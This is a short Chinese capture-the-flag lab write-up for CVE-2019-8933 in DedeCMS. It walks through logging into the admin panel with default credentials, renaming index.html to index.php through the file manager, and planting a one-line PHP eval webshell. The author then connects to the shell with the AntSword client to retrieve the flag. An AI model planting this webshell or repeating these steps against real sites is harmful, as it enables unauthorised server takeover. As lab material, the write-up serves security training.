春秋云境CVE-2019-8933

1.阅读靶场介绍

这里我们能得到的信息就是

将文件名../index.html更改成../index.php应用该漏洞向uploads/目录上传.php文件并执行该文件。

简单来说就是在后台把index.html的文件改为index.php并且修改内容为

<?php @eval($_POST'cmd');?>

然后就可以完成webshell了

2.启动靶场

如下图所示

博主这里是把靶场介绍喂给ai得到的后台路径

直接在路径拼接/dede这个就会跳转到登入页面

如下图所示

账号/密码是admin/admin

进入后台以后我们点击这个文件式管理器

右边有一个index.html我们点击编辑

会出现下述页面

这里要修改一下文件名称和内容

index.php

<?php @eval($_POST'cmd');?>

保存即可

然后访问

出现一片空白的就是对的

下面这个是url

https://eci-2ze1zd9kizhz7f10jpim.cloudeci1.ichunqiu.com/uploads/index.php

最后就是启动中国蚁剑

输入url和木马的密码

我们就可以完成webshell了

这里我们就可以找到flag

感谢您宝贵的时间

喜欢博主的作品可以点赞支持支持哟

相关推荐
启雀AI4 小时前
生物医疗行业如何建设合规、安全、可复用的知识库?
人工智能·安全·软件构建·知识图谱·知识库
Sirius Wu5 小时前
OpenClaw Skill:Matplotlib 可视化技能 + 沙箱双层隔离完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
冬奇Lab5 小时前
每日一个开源项目(第160篇):Destructive Command Guard - 在 AI Agent 运行 rm -rf 之前拦截它
人工智能·安全·开源
ChainSafeAI0027 小时前
Summer.fi 遭600万美元漏洞攻击,安全警报拉响
安全
一勺菠萝丶9 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
味悲10 小时前
搭建WAF+宝塔反向代理
安全
BenSmith11 小时前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
happyness4412 小时前
AI重构实战案例:安全地将旧系统中大量基于 Thread 和同步阻塞的硬件通信代码,重构为现代的 async/await Task 异步架构
人工智能·安全·重构
Dola_Zou12 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
小小小小钰儿13 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程